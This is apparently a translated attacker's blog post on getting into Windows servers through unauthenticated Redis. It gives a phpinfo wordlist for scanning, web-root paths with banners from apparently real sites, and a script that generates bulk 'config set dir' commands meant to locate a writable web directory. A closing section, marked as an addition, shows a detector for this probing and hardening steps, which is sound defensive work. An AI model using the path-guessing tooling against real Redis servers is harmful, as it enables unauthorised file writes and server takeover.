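Unauthenticated Redis on Windows is sometimes a real pain: unlike on Linux, you can't write a scheduled task or a private key to get server access directly. So I collected 100+ phpinfo paths and wrote a script that automatically generates candidate absolute paths for the website (Windows only; I haven't collected enough for Linux) to make guessing easier.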

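The absolute path can also be obtained by scanning neighboring sites on the same server for phpinfo paths, or from 404 error pages. Here is a phpinfo wordlist; it can be checked in bulk with 7kb's 7kbscan-WebPathBrute tool: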

phpinfo.php
info.php
phpversion.php
test1.php
test.php
test2.php
phpinfo1.php
info1.php
x.php
xx.php
xxx.php
tz.php
env.php
p.php
aspcheck.asp
pi.php
i.php
l.php
1.php
php.php
pi.php
tz/tz.php
tst.php

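Some sites are built with an integrated stack; you can tell them apart by checking the Server header in the browser's developer tools. Here is a wordlist for those as well: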

phpstudy/xampp/wamp2 integrated environments:
C:/phpStudy/PHPTutorial/WWW
E:\wamp64\www\sowosky\                  Apache/2.4.27 (Win64) PHP/5.6.31
D:/phpStudy/WWW/                        Apache/2.4.10 (Win32) OpenSSL/0.9.8zb PHP/5.3.29
D:/phpStudy/WWW/                        Apache/2.4.23 (Win32) OpenSSL/1.0.2j
D:/phpStudy/WWW/dl/public/              Apache/2.4.10 (Win32) OpenSSL/0.9.8zb mod_fcgid/2.3.9
D:/phpStudy/WWW/satcm2018/              Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
D:\WEB_51TTYY\WWW\
D:/web/WWW/                             Apache/2.4.10 (Win32) OpenSSL/0.9.8zb mod_fcgid/2.3.9
D:/wwwroot/www.zhongguanjiaoshi.com/    Apache/2.4.27 (Win32) OpenSSL/1.0.2l mod_fcgid/2.3.9
D:/www/gxqzxw/                          Apache/2.4.25 (Win64) OpenSSL/1.0.2k
D:/WWW/                                 Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.2.17
D:/wwwroot/xlsly/                       Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.2.17
E:\chinwin\
E:/phpStudy/WWW/                        Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
E:/wamp2/wamp/www/lw/                   Apache/2.2.11 (Win32) PHP/5.2.9-2
E:/xampp/htdocs/                        Apache/2.4.26 (Win32) OpenSSL/1.0.2l PHP/5.6.31
D:/web/renfangwang/                     Apache/2.4.9 (Win64) PHP/5.5.12

Absolute path generation script:

# coding: utf-8

realdomain = 'bbs.sloot.net'  # domain name
pre = 'd:/'  # starting drive

www1 = realdomain.split('.')  # split on '.'
# every label after the first, joined without dots
topdomainnopoint = ''.join(www1[1:])

domainnopoint = realdomain.replace('.', '')
topdomain = realdomain.split('.', 1)[-1]
hosthead = www1[0]
domaincenter = www1[1]
domainunderline = realdomain.replace('.', '_')
topdomainunderline = topdomain.replace('.', '_')

l1 = ['www','wwroot','wwwroot','wwwroot1','web','website','webdata','webroot','websoft','html','site','sites','project','http','htdocs','myweb','wz','wangzhan','app','AppFile','public','public_html','hws_web','host','Hosting','default','phpStudy','PHPTutorial','wamp64','wamp2','wamp','xampp','Inetpub','apache','apache2','data','virtualhost','WebSiteIng','vhost','freehost','webhosting','clients','cn','en','zh','web2018','soft','code','LocalUser','vhosts','httpdocs','IIS','HwsHostMaster','phpweb','usr','test','home','Application','robotsite', 'HostingSpaces', 'WebSites']
l2 = [realdomain,domainnopoint,topdomainnopoint,topdomain,hosthead,domaincenter,domainunderline,topdomainunderline]
l1.extend(l2)

# one Redis command per candidate directory
for i in l1:
    print('config set dir ' + pre + i)

The generated paths:

config set dir d:/www
config set dir d:/wwwroot
config set dir d:/wwwroot1
config set dir d:/web
config set dir d:/website
config set dir d:/webdata
config set dir d:/webroot
config set dir d:/websoft
config set dir d:/html
config set dir d:/site
config set dir d:/sites
config set dir d:/project
config set dir d:/http
config set dir d:/htdocs
config set dir d:/myweb
config set dir d:/wz
config set dir d:/wangzhan
config set dir d:/app
config set dir d:/AppFile
config set dir d:/public
config set dir d:/public_html
config set dir d:/hws_web
config set dir d:/host
config set dir d:/Hosting
config set dir d:/default
config set dir d:/phpStudy
config set dir d:/PHPTutorial
config set dir d:/wamp64
config set dir d:/wamp2
config set dir d:/wamp
config set dir d:/xampp
config set dir d:/Inetpub
config set dir d:/apache
config set dir d:/apache2
config set dir d:/data
config set dir d:/virtualhost
config set dir d:/WebSiteIng
config set dir d:/vhost
config set dir d:/freehost
config set dir d:/webhosting
config set dir d:/clients
config set dir d:/cn
config set dir d:/en
config set dir d:/zh
config set dir d:/web2018
config set dir d:/soft
config set dir d:/code
config set dir d:/bbs.sloot.net
config set dir d:/bbsslootnet
config set dir d:/slootnet
config set dir d:/sloot.net
config set dir d:/bbs
config set dir d:/sloot
config set dir d:/bbs_sloot_net
config set dir d:/sloot_net

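Then, on Windows, connect with redis-cli -h ip and paste in all of the paths generated above to test them in bulk. On Windows each line is executed one by one, but on Linux it is not.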
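Seen from the defending side, the bulk test described above appears as one client issuing many `CONFIG SET dir` commands with different paths in a short time. The following added example (not part of the original post) flags that pattern in `redis-cli MONITOR` output; the sample lines, IP addresses, threshold and window are constructed assumptions.

```python
import re
import shlex
from collections import defaultdict

# Constructed sample of `redis-cli MONITOR` output (timestamps and IPs are made up).
SAMPLE_MONITOR = '''\
1700000000.100000 [0 203.0.113.7:50112] "config" "set" "dir" "d:/www"
1700000000.300000 [0 203.0.113.7:50112] "config" "set" "dir" "d:/wwwroot"
1700000000.500000 [0 203.0.113.7:50112] "CONFIG" "SET" "dir" "d:/web"
1700000000.700000 [0 203.0.113.7:50112] "config" "set" "dir" "d:/phpStudy"
1700000000.900000 [0 203.0.113.7:50112] "config" "set" "dir" "d:/xampp"
1700000001.000000 [0 10.0.0.5:41000] "get" "session:42"
1700000050.000000 [0 10.0.0.5:41000] "config" "set" "dir" "d:/redis/data"
'''
LINE_RE = re.compile(r'^(\d+\.\d+) \[\d+ (\S+)\] (.*)$')

def parse_monitor_line(line):
    """Return (timestamp, client_host, [args]) or None if the line does not parse."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    try:
        return float(m.group(1)), m.group(2).rsplit(':', 1)[0], shlex.split(m.group(3))
    except ValueError:  # unbalanced quotes in a truncated line
        return None

def find_dir_probing(text, threshold=4, window=10.0):
    """Flag clients that set `dir` to >= threshold distinct paths within `window` seconds."""
    events = defaultdict(list)  # client host -> [(timestamp, path)]
    for line in text.splitlines():
        parsed = parse_monitor_line(line)
        if parsed is None:
            continue
        ts, ip, args = parsed
        if len(args) >= 4 and [a.lower() for a in args[:3]] == ['config', 'set', 'dir']:
            events[ip].append((ts, args[3]))
    alerts = {}
    for ip, evs in events.items():
        evs.sort()
        for start_ts, _ in evs:
            paths = {p for t, p in evs if start_ts <= t <= start_ts + window}
            if len(paths) >= threshold:
                alerts[ip] = sorted(paths)
                break
    return alerts

if __name__ == '__main__':
    for ip, paths in find_dir_probing(SAMPLE_MONITOR).items():
        print(f'ALERT {ip}: {len(paths)} distinct CONFIG SET dir values: {paths}')
```

Setting `requirepass`, binding Redis to a non-public interface, or disabling `CONFIG` with `rename-command` in redis.conf removes the exposure this detection looks for.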
